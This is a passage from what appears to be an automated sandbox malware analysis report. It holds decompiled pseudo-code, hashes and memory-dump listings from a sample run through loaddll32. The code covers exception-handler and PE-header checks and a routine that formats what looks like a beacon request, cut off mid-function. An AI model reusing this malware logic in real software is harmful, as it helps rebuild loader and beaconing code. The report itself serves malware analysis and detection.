                                          							if( *((intOrPtr*)(0xc7d2e0 + _t58 * 4)) == _t110) {
                                          								L32:
                                          								_t100 = 0;
                                          								__eflags = _t58;
                                          								if(_t58 < 0) {
                                          									L34:
                                          									 *0xc7d320 = 0;
                                          									goto L5;
                                          								} else {
                                          									goto L33;
                                          								}
                                          								do {
                                          									L33:
                                          									_t90 = 0xc7d2e0 + _t100 * 4;
                                          									_t100 = _t100 + 1;
                                          									__eflags = _t100 - _t58;
                                          									 *_t90 = _t110;
                                          									_t110 =  *_t90;
                                          								} while (_t100 <= _t58);
                                          								goto L34;
                                          							}
                                          							_t25 = _t81 - 1; // -1
                                          							_t58 = _t25;
                                          							__eflags = _t58;
                                          							if(_t58 < 0) {
                                          								L28:
                                          								__eflags = _t81 - 0x10;
                                          								if(_t81 < 0x10) {
                                          									_t81 = _t81 + 1;
                                          									__eflags = _t81;
                                          									 *0xc7d2d8 = _t81;
                                          								}
                                          								_t28 = _t81 - 1; // 0x0
                                          								_t58 = _t28;
                                          								goto L32;
                                          							} else {
                                          								goto L25;
                                          							}
                                          							while(1) {
                                          								L25:
                                          								__eflags =  *((intOrPtr*)(0xc7d2e0 + _t58 * 4)) - _t110;
                                          								if( *((intOrPtr*)(0xc7d2e0 + _t58 * 4)) == _t110) {
                                          									break;
                                          								}
                                          								_t58 = _t58 - 1;
                                          								__eflags = _t58;
                                          								if(_t58 >= 0) {
                                          									continue;
                                          								}
                                          								break;
                                          							}
                                          							__eflags = _t58;
                                          							if(__eflags >= 0) {
                                          								if(__eflags == 0) {
                                          									goto L34;
                                          								}
                                          								goto L32;
                                          							}
                                          							goto L28;
                                          						}
                                          						_t75 =  *((intOrPtr*)(_t108 - 8));
                                          						__eflags = _t75 - _v8;
                                          						if(_t75 < _v8) {
                                          							goto L20;
                                          						}
                                          						__eflags = _t75 - _t108;
                                          						if(_t75 >= _t108) {
                                          							goto L20;
                                          						}
                                          						goto L15;
                                          					}
                                          					L5:
                                          					_t63 = 1;
                                          					goto L60;
                                          				} else {
                                          					goto L3;
                                          				}
                                          			}


                                          APIs
                                          • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00C7B3AE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: MemoryQueryVirtual
                                          • String ID:
                                          • API String ID: 2850889275-0
                                          • Opcode ID: 83b4dca0e5e1cdb50b912a4e34e2d2e0ec1f1c82f65eb65b444bc7ab3230f368
                                          • Instruction ID: 21fb84f3a1ce0d09ad43bd26b9c5af734a6500ce8acdb676ee26e6c689dba6da
                                          • Opcode Fuzzy Hash: 83b4dca0e5e1cdb50b912a4e34e2d2e0ec1f1c82f65eb65b444bc7ab3230f368
                                          • Instruction Fuzzy Hash: 7061B031A006068FDB29CF29C89577973A5EF85354F64C579D82ED72A2EB30DE82C790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E005F23F5(long _a4) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				signed int _v16;
                                          				short* _v32;
                                          				void _v36;
                                          				void* _t57;
                                          				signed int _t58;
                                          				signed int _t61;
                                          				signed int _t62;
                                          				void* _t63;
                                          				signed int* _t68;
                                          				intOrPtr* _t69;
                                          				intOrPtr* _t71;
                                          				intOrPtr _t72;
                                          				intOrPtr _t75;
                                          				void* _t76;
                                          				signed int _t77;
                                          				void* _t78;
                                          				void _t80;
                                          				signed int _t81;
                                          				signed int _t84;
                                          				signed int _t86;
                                          				short* _t87;
                                          				void* _t89;
                                          				signed int* _t90;
                                          				long _t91;
                                          				signed int _t93;
                                          				signed int _t94;
                                          				signed int _t100;
                                          				signed int _t102;
                                          				void* _t104;
                                          				long _t108;
                                          				signed int _t110;
                                          
                                          				_t108 = _a4;
                                          				_t76 =  *(_t108 + 8);
                                          				if((_t76 & 0x00000003) != 0) {
                                          					L3:
                                          					return 0;
                                          				}
                                          				_a4 =  *[fs:0x4];
                                          				_v8 =  *[fs:0x8];
                                          				if(_t76 < _v8 || _t76 >= _a4) {
                                          					_t102 =  *(_t108 + 0xc);
                                          					__eflags = _t102 - 0xffffffff;
                                          					if(_t102 != 0xffffffff) {
                                          						_t91 = 0;
                                          						__eflags = 0;
                                          						_a4 = 0;
                                          						_t57 = _t76;
                                          						do {
                                          							_t80 =  *_t57;
                                          							__eflags = _t80 - 0xffffffff;
                                          							if(_t80 == 0xffffffff) {
                                          								goto L9;
                                          							}
                                          							__eflags = _t80 - _t91;
                                          							if(_t80 >= _t91) {
                                          								L20:
                                          								_t63 = 0;
                                          								L60:
                                          								return _t63;
                                          							}
                                          							L9:
                                          							__eflags =  *(_t57 + 4);
                                          							if( *(_t57 + 4) != 0) {
                                          								_t12 =  &_a4;
                                          								 *_t12 = _a4 + 1;
                                          								__eflags =  *_t12;
                                          							}
                                          							_t91 = _t91 + 1;
                                          							_t57 = _t57 + 0xc;
                                          							__eflags = _t91 - _t102;
                                          						} while (_t91 <= _t102);
                                          						__eflags = _a4;
                                          						if(_a4 == 0) {
                                          							L15:
                                          							_t81 =  *0x5f4178;
                                          							_t110 = _t76 & 0xfffff000;
                                          							_t58 = 0;
                                          							__eflags = _t81;
                                          							if(_t81 <= 0) {
                                          								L18:
                                          								_t104 = _t102 | 0xffffffff;
                                          								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                          								__eflags = _t61;
                                          								if(_t61 < 0) {
                                          									_t62 = 0;
                                          									__eflags = 0;
                                          								} else {
                                          									_t62 = _a4;
                                          								}
                                          								__eflags = _t62;
                                          								if(_t62 == 0) {
                                          									L59:
                                          									_t63 = _t104;
                                          									goto L60;
                                          								} else {
                                          									__eflags = _v12 - 0x1000000;
                                          									if(_v12 != 0x1000000) {
                                          										goto L59;
                                          									}
                                          									__eflags = _v16 & 0x000000cc;
                                          									if((_v16 & 0x000000cc) == 0) {
                                          										L46:
                                          										_t63 = 1;
                                          										 *0x5f41c0 = 1;
                                          										__eflags =  *0x5f41c0;
                                          										if( *0x5f41c0 != 0) {
                                          											goto L60;
                                          										}
                                          										_t84 =  *0x5f4178;
                                          										__eflags = _t84;
                                          										_t93 = _t84;
                                          										if(_t84 <= 0) {
                                          											L51:
                                          											__eflags = _t93;
                                          											if(_t93 != 0) {
                                          												L58:
                                          												 *0x5f41c0 = 0;
                                          												goto L5;
                                          											}
                                          											_t77 = 0xf;
                                          											__eflags = _t84 - _t77;
                                          											if(_t84 <= _t77) {
                                          												_t77 = _t84;
                                          											}
                                          											_t94 = 0;
                                          											__eflags = _t77;
                                          											if(_t77 < 0) {
                                          												L56:
                                          												__eflags = _t84 - 0x10;
                                          												if(_t84 < 0x10) {
                                          													_t86 = _t84 + 1;
                                          													__eflags = _t86;
                                          													 *0x5f4178 = _t86;
                                          												}
                                          												goto L58;
                                          											} else {
                                          												do {
                                          													_t68 = 0x5f4180 + _t94 * 4;
                                          													_t94 = _t94 + 1;
                                          													__eflags = _t94 - _t77;
                                          													 *_t68 = _t110;
                                          													_t110 =  *_t68;
                                          												} while (_t94 <= _t77);
                                          												goto L56;
                                          											}
                                          										}
                                          										_t69 = 0x5f417c + _t84 * 4;
                                          										while(1) {
                                          											__eflags =  *_t69 - _t110;
                                          											if( *_t69 == _t110) {
                                          												goto L51;
                                          											}
                                          											_t93 = _t93 - 1;
                                          											_t69 = _t69 - 4;
                                          											__eflags = _t93;
                                          											if(_t93 > 0) {
                                          												continue;
                                          											}
                                          											goto L51;
                                          										}
                                          										goto L51;
                                          									}
                                          									_t87 = _v32;
                                          									__eflags =  *_t87 - 0x5a4d;
                                          									if( *_t87 != 0x5a4d) {
                                          										goto L59;
                                          									}
                                          									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                          									__eflags =  *_t71 - 0x4550;
                                          									if( *_t71 != 0x4550) {
                                          										goto L59;
                                          									}
                                          									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                          									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                          										goto L59;
                                          									}
                                          									_t78 = _t76 - _t87;
                                          									__eflags =  *((short*)(_t71 + 6));
                                          									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                          									if( *((short*)(_t71 + 6)) <= 0) {
                                          										goto L59;
                                          									}
                                          									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                          									__eflags = _t78 - _t72;
                                          									if(_t78 < _t72) {
                                          										goto L46;
                                          									}
                                          									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                          									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                          										goto L46;
                                          									}
                                          									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                          									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                          										goto L20;
                                          									}
                                          									goto L46;
                                          								}
                                          							} else {
                                          								goto L16;
                                          							}
                                          							while(1) {
                                          								L16:
                                          								__eflags =  *((intOrPtr*)(0x5f4180 + _t58 * 4)) - _t110;
                                          								if( *((intOrPtr*)(0x5f4180 + _t58 * 4)) == _t110) {
                                          									break;
                                          								}
                                          								_t58 = _t58 + 1;
                                          								__eflags = _t58 - _t81;
                                          								if(_t58 < _t81) {
                                          									continue;
                                          								}
                                          								goto L18;
                                          							}
                                          							__eflags = _t58;
                                          							if(_t58 <= 0) {
                                          								goto L5;
                                          							}
                                          							 *0x5f41c0 = 1;
                                          							__eflags =  *0x5f41c0;
                                          							if( *0x5f41c0 != 0) {
                                          								goto L5;
                                          							}
                                          							__eflags =  *((intOrPtr*)(0x5f4180 + _t58 * 4)) - _t110;
                                          							if( *((intOrPtr*)(0x5f4180 + _t58 * 4)) == _t110) {
                                          								L32:
                                          								_t100 = 0;
                                          								__eflags = _t58;
                                          								if(_t58 < 0) {
                                          									L34:
                                          									 *0x5f41c0 = 0;
                                          									goto L5;
                                          								} else {
                                          									goto L33;
                                          								}
                                          								do {
                                          									L33:
                                          									_t90 = 0x5f4180 + _t100 * 4;
                                          									_t100 = _t100 + 1;
                                          									__eflags = _t100 - _t58;
                                          									 *_t90 = _t110;
                                          									_t110 =  *_t90;
                                          								} while (_t100 <= _t58);
                                          								goto L34;
                                          							}
                                          							_t58 = _t81 - 1;
                                          							__eflags = _t58;
                                          							if(_t58 < 0) {
                                          								L28:
                                          								__eflags = _t81 - 0x10;
                                          								if(_t81 < 0x10) {
                                          									_t81 = _t81 + 1;
                                          									__eflags = _t81;
                                          									 *0x5f4178 = _t81;
                                          								}
                                          								_t58 = _t81 - 1;
                                          								goto L32;
                                          							} else {
                                          								goto L25;
                                          							}
                                          							while(1) {
                                          								L25:
                                          								__eflags =  *((intOrPtr*)(0x5f4180 + _t58 * 4)) - _t110;
                                          								if( *((intOrPtr*)(0x5f4180 + _t58 * 4)) == _t110) {
                                          									break;
                                          								}
                                          								_t58 = _t58 - 1;
                                          								__eflags = _t58;
                                          								if(_t58 >= 0) {
                                          									continue;
                                          								}
                                          								break;
                                          							}
                                          							__eflags = _t58;
                                          							if(__eflags >= 0) {
                                          								if(__eflags == 0) {
                                          									goto L34;
                                          								}
                                          								goto L32;
                                          							}
                                          							goto L28;
                                          						}
                                          						_t75 =  *((intOrPtr*)(_t108 - 8));
                                          						__eflags = _t75 - _v8;
                                          						if(_t75 < _v8) {
                                          							goto L20;
                                          						}
                                          						__eflags = _t75 - _t108;
                                          						if(_t75 >= _t108) {
                                          							goto L20;
                                          						}
                                          						goto L15;
                                          					}
                                          					L5:
                                          					_t63 = 1;
                                          					goto L60;
                                          				} else {
                                          					goto L3;
                                          				}
                                          			}
                                          0x005f250a
                                          0x005f250c
                                          0x005f250e
                                          0x005f2522
                                          0x005f2524
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x005f2510
                                          0x005f2510
                                          0x005f2510
                                          0x005f2519
                                          0x005f251a
                                          0x005f251c
                                          0x005f251e
                                          0x005f251e
                                          0x00000000
                                          0x005f2510
                                          0x005f24e0
                                          0x005f24e3
                                          0x005f24e5
                                          0x005f24f7
                                          0x005f24f7
                                          0x005f24fa
                                          0x005f24fc
                                          0x005f24fc
                                          0x005f24fd
                                          0x005f24fd
                                          0x005f2503
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x005f24e7
                                          0x005f24e7
                                          0x005f24e7
                                          0x005f24ee
                                          0x00000000
                                          0x00000000
                                          0x005f24f0
                                          0x005f24f0
                                          0x005f24f1
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x005f24f1
                                          0x005f24f3
                                          0x005f24f5
                                          0x005f2508
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x005f2508
                                          0x00000000
                                          0x005f24f5
                                          0x005f2467
                                          0x005f246a
                                          0x005f246d
                                          0x00000000
                                          0x00000000
                                          0x005f246f
                                          0x005f2471
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x005f2471
                                          0x005f2436
                                          0x005f2438
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 005F24A6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.519649525.00000000005F0000.00000040.00020000.sdmp, Offset: 005F0000, based on PE: true
                                          • Associated: 00000000.00000002.519749348.00000000005F5000.00000040.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.519817057.00000000005F7000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5f0000_loaddll32.jbxd
                                          Similarity
                                          • API ID: MemoryQueryVirtual
                                          • String ID:
                                          • API String ID: 2850889275-0
                                          • Opcode ID: a45811e2d0b1e4a7798b77c8f2adf368f895414ab0de44450c61a362952d73d3
                                          • Instruction ID: 39cc242d48aa18eb26f57b312e83399b955dc017aedfadaade99a8a7e3ff022e
                                          • Opcode Fuzzy Hash: a45811e2d0b1e4a7798b77c8f2adf368f895414ab0de44450c61a362952d73d3
                                          • Instruction Fuzzy Hash: 9D61E7B060060E9FDF29CF29D8A467A3FA5FBA4314F248429DB46CB191E77CDC81DA50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521216705.0000000000C20000.00000040.00000001.sdmp, Offset: 00C20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c20000_loaddll32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: t32c
                                          • API String ID: 0-3674199949
                                          • Opcode ID: 82a7aaabc82de09c9f2f8de54ffda81c0058729bef8bb6ace369724d4dbbbd1f
                                          • Instruction ID: fe5260f64aee0c194a941239e91dcb5874d142cea90843bb3a0a1cfadb70c6b1
                                          • Opcode Fuzzy Hash: 82a7aaabc82de09c9f2f8de54ffda81c0058729bef8bb6ace369724d4dbbbd1f
                                          • Instruction Fuzzy Hash: 3EE11672A00229EFDF24CB90DC80BAAB7B5FF88314F2482D6D519A7516D330AE91DF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521216705.0000000000C20000.00000040.00000001.sdmp, Offset: 00C20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c20000_loaddll32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f5448e4018b36f8f4564e0439fce57eb74105e0727b89d9800eb0fc40e93c5b8
                                          • Instruction ID: d242306aafb2de250fd74ada64401f20413bb1a9514a7ce71056194ffef531bb
                                          • Opcode Fuzzy Hash: f5448e4018b36f8f4564e0439fce57eb74105e0727b89d9800eb0fc40e93c5b8
                                          • Instruction Fuzzy Hash: 1F417372A00229DFCF20CF44D880B99B7B5FF48310F698596D95967616D330EE85CF81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521216705.0000000000C20000.00000040.00000001.sdmp, Offset: 00C20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c20000_loaddll32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c09382aa32863d1404881d5de5498841655872c6132f3eb532c889ee66d7b28a
                                          • Instruction ID: 7b19d110203614ad05d46d986ead293df295ab076141193df3502ada874058fa
                                          • Opcode Fuzzy Hash: c09382aa32863d1404881d5de5498841655872c6132f3eb532c889ee66d7b28a
                                          • Instruction Fuzzy Hash: BE415A76A00229DFDF20CF54D880BA9B7B5FF88720F298595D9496B616C330EE80CF85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 71%
                                          			E00C7B0DC(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                          				intOrPtr _v8;
                                          				char _v12;
                                          				void* __ebp;
                                          				signed int* _t43;
                                          				char _t44;
                                          				void* _t46;
                                          				void* _t49;
                                          				intOrPtr* _t53;
                                          				void* _t54;
                                          				void* _t65;
                                          				long _t66;
                                          				signed int* _t80;
                                          				signed int* _t82;
                                          				void* _t84;
                                          				signed int _t86;
                                          				void* _t89;
                                          				void* _t95;
                                          				void* _t96;
                                          				void* _t99;
                                          				void* _t106;
                                          
                                          				_t43 = _t84;
                                          				_t65 = __ebx + 2;
                                          				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                          				_t89 = _t95;
                                          				_t96 = _t95 - 8;
                                          				_push(_t65);
                                          				_push(_t84);
                                          				_push(_t89);
                                          				asm("cld");
                                          				_t66 = _a8;
                                          				_t44 = _a4;
                                          				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                          					_push(_t89);
                                          					E00C7B243(_t66 + 0x10, _t66, 0xffffffff);
                                          					_t46 = 1;
                                          				} else {
                                          					_v12 = _t44;
                                          					_v8 = _a12;
                                          					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                          					_t86 =  *(_t66 + 0xc);
                                          					_t80 =  *(_t66 + 8);
                                          					_t49 = E00C7B2FD(_t66);
                                          					_t99 = _t96 + 4;
                                          					if(_t49 == 0) {
                                          						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                          						goto L11;
                                          					} else {
                                          						while(_t86 != 0xffffffff) {
                                          							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                          							if(_t53 == 0) {
                                          								L8:
                                          								_t80 =  *(_t66 + 8);
                                          								_t86 = _t80[_t86 + _t86 * 2];
                                          								continue;
                                          							} else {
                                          								_t54 =  *_t53();
                                          								_t89 = _t89;
                                          								_t86 = _t86;
                                          								_t66 = _a8;
                                          								_t55 = _t54;
                                          								_t106 = _t54;
                                          								if(_t106 == 0) {
                                          									goto L8;
                                          								} else {
                                          									if(_t106 < 0) {
                                          										_t46 = 0;
                                          									} else {
                                          										_t82 =  *(_t66 + 8);
                                          										E00C7B1E8(_t55, _t66);
                                          										_t89 = _t66 + 0x10;
                                          										E00C7B243(_t89, _t66, 0);
                                          										_t99 = _t99 + 0xc;
                                          										E00C7B2DF(_t82[2]);
                                          										 *(_t66 + 0xc) =  *_t82;
                                          										_t66 = 0;
                                          										_t86 = 0;
                                          										 *(_t82[2])(1);
                                          										goto L8;
                                          									}
                                          								}
                                          							}
                                          							goto L13;
                                          						}
                                          						L11:
                                          						_t46 = 1;
                                          					}
                                          				}
                                          				L13:
                                          				return _t46;
                                          			}


                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                          • Instruction ID: 982c16e673cad3ea21fd3f9928f6f948ca30bf8148c97e802009f690ee0955dc
                                          • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                          • Instruction Fuzzy Hash: 1D21A7729002049FCB14DF69C895AABBBA5BF44350B45C168E9199B245D730FE15C7E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 71%
                                          			E005F21D4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                          				intOrPtr _v8;
                                          				char _v12;
                                          				void* __ebp;
                                          				signed int* _t43;
                                          				char _t44;
                                          				void* _t46;
                                          				void* _t49;
                                          				intOrPtr* _t53;
                                          				void* _t54;
                                          				void* _t65;
                                          				long _t66;
                                          				signed int* _t80;
                                          				signed int* _t82;
                                          				void* _t84;
                                          				signed int _t86;
                                          				void* _t89;
                                          				void* _t95;
                                          				void* _t96;
                                          				void* _t99;
                                          				void* _t106;
                                          
                                          				_t43 = _t84;
                                          				_t65 = __ebx + 2;
                                          				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                          				_t89 = _t95;
                                          				_t96 = _t95 - 8;
                                          				_push(_t65);
                                          				_push(_t84);
                                          				_push(_t89);
                                          				asm("cld");
                                          				_t66 = _a8;
                                          				_t44 = _a4;
                                          				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                          					_push(_t89);
                                          					E005F233B(_t66 + 0x10, _t66, 0xffffffff);
                                          					_t46 = 1;
                                          				} else {
                                          					_v12 = _t44;
                                          					_v8 = _a12;
                                          					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                          					_t86 =  *(_t66 + 0xc);
                                          					_t80 =  *(_t66 + 8);
                                          					_t49 = E005F23F5(_t66);
                                          					_t99 = _t96 + 4;
                                          					if(_t49 == 0) {
                                          						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                          						goto L11;
                                          					} else {
                                          						while(_t86 != 0xffffffff) {
                                          							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                          							if(_t53 == 0) {
                                          								L8:
                                          								_t80 =  *(_t66 + 8);
                                          								_t86 = _t80[_t86 + _t86 * 2];
                                          								continue;
                                          							} else {
                                          								_t54 =  *_t53();
                                          								_t89 = _t89;
                                          								_t86 = _t86;
                                          								_t66 = _a8;
                                          								_t55 = _t54;
                                          								_t106 = _t54;
                                          								if(_t106 == 0) {
                                          									goto L8;
                                          								} else {
                                          									if(_t106 < 0) {
                                          										_t46 = 0;
                                          									} else {
                                          										_t82 =  *(_t66 + 8);
                                          										E005F22E0(_t55, _t66);
                                          										_t89 = _t66 + 0x10;
                                          										E005F233B(_t89, _t66, 0);
                                          										_t99 = _t99 + 0xc;
                                          										E005F23D7(_t82[2], 1);
                                          										 *(_t66 + 0xc) =  *_t82;
                                          										_t66 = 0;
                                          										_t86 = 0;
                                          										 *(_t82[2])();
                                          										goto L8;
                                          									}
                                          								}
                                          							}
                                          							goto L13;
                                          						}
                                          						L11:
                                          						_t46 = 1;
                                          					}
                                          				}
                                          				L13:
                                          				return _t46;
                                          			}


                                          Memory Dump Source
                                          • Source File: 00000000.00000002.519649525.00000000005F0000.00000040.00020000.sdmp, Offset: 005F0000, based on PE: true
                                          • Associated: 00000000.00000002.519749348.00000000005F5000.00000040.00020000.sdmp
                                          • Associated: 00000000.00000002.519817057.00000000005F7000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5f0000_loaddll32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                          • Instruction ID: 68fdd76ced2cedbbf8c1fe2ff445a458fb93d6eb4f9f1fc5b3d634b3f79ccd82
                                          • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                          • Instruction Fuzzy Hash: 2A21D6B69002099BCB10DF68C8C49BBBFA5FF88350F468569EA159B245D734FA15CBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521216705.0000000000C20000.00000040.00000001.sdmp, Offset: 00C20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c20000_loaddll32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6d6af18e62d48141748dec560edc45937fa8636c77b1ce60b66d1111b4985eae
                                          • Instruction ID: 48ecb0119360c2cf02584a7dd325e82a54f0792c686e397cc8a67155876b7d7e
                                          • Opcode Fuzzy Hash: 6d6af18e62d48141748dec560edc45937fa8636c77b1ce60b66d1111b4985eae
                                          • Instruction Fuzzy Hash: B8E0B6B1A00118EEEF15CA40CC40FF6B7BDEBC9700F0481D6A60CAA150D6306E848F60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521216705.0000000000C20000.00000040.00000001.sdmp, Offset: 00C20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c20000_loaddll32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 981ae7a2e560dead5f088f94c0b916592ccfa2d749defbc40be1ee7aea399cb3
                                          • Instruction ID: 0c27d4737e9b031e854781b069859cc89c411b73da2f202a3b6830c1d29b2dee
                                          • Opcode Fuzzy Hash: 981ae7a2e560dead5f088f94c0b916592ccfa2d749defbc40be1ee7aea399cb3
                                          • Instruction Fuzzy Hash: 05D09235E0026CDFCF20CA50C810BAAF3B2BF9A350F6600CAD8083720187302E82CE51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 66%
                                          			E00C7514F(long __eax, void* __ecx, void* __edx, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
                                          				intOrPtr _v0;
                                          				intOrPtr _v4;
                                          				intOrPtr _v20;
                                          				intOrPtr _v28;
                                          				intOrPtr _v32;
                                          				void* _v48;
                                          				intOrPtr _v56;
                                          				void* __edi;
                                          				long _t26;
                                          				intOrPtr _t27;
                                          				intOrPtr _t28;
                                          				intOrPtr _t29;
                                          				intOrPtr _t30;
                                          				intOrPtr _t31;
                                          				void* _t34;
                                          				intOrPtr _t35;
                                          				int _t38;
                                          				intOrPtr _t43;
                                          				intOrPtr _t44;
                                          				intOrPtr _t51;
                                          				intOrPtr _t55;
                                          				intOrPtr* _t57;
                                          				intOrPtr _t63;
                                          				intOrPtr _t65;
                                          				intOrPtr _t71;
                                          				intOrPtr _t74;
                                          				intOrPtr _t77;
                                          				int _t80;
                                          				intOrPtr _t81;
                                          				int _t84;
                                          				intOrPtr _t86;
                                          				int _t89;
                                          				intOrPtr* _t92;
                                          				intOrPtr* _t93;
                                          				void* _t94;
                                          				void* _t98;
                                          				void* _t99;
                                          				void* _t100;
                                          				intOrPtr _t101;
                                          				void* _t103;
                                          				int _t104;
                                          				void* _t105;
                                          				void* _t106;
                                          				void* _t108;
                                          				void* _t109;
                                          				void* _t111;
                                          
                                          				_t98 = __edx;
                                          				_t94 = __ecx;
                                          				_t26 = __eax;
                                          				_t108 = _a16;
                                          				_v4 = 8;
                                          				if(__eax == 0) {
                                          					_t26 = GetTickCount();
                                          				}
                                          				_t27 =  *0xc7d018; // 0x3df0b315
                                          				asm("bswap eax");
                                          				_t28 =  *0xc7d014; // 0x3a87c8cd
                                          				asm("bswap eax");
                                          				_t29 =  *0xc7d010; // 0xd8d2f808
                                          				asm("bswap eax");
                                          				_t30 =  *0xc7d00c; // 0x8f8f86c2
                                          				asm("bswap eax");
                                          				_t31 =  *0xc7d2a4; // 0x24ba5a8
                                          				_t3 = _t31 + 0xc7e633; // 0x74666f73
                                          				_t104 = wsprintfA(_t108, _t3, 2, 0x3d137, _t30, _t29, _t28, _t27,  *0xc7d02c,  *0xc7d004, _t26);
                                          				_t34 = E00C757AB();
                                          				_t35 =  *0xc7d2a4; // 0x24ba5a8
                                          				_t4 = _t35 + 0xc7e673; // 0x74707526
                                          				_t38 = wsprintfA(_t104 + _t108, _t4, _t34);
                                          				_t111 = _t109 + 0x38;
                                          				_t105 = _t104 + _t38;
                                          				_t99 = E00C773E9(_t94);
                                          				if(_t99 != 0) {
                                          					_t86 =  *0xc7d2a4; // 0x24ba5a8
                                          					_t6 = _t86 + 0xc7e8cb; // 0x736e6426
                                          					_t89 = wsprintfA(_t105 + _t108, _t6, _t99);
                                          					_t111 = _t111 + 0xc;
                                          					_t105 = _t105 + _t89;
                                          					HeapFree( *0xc7d238, 0, _t99);
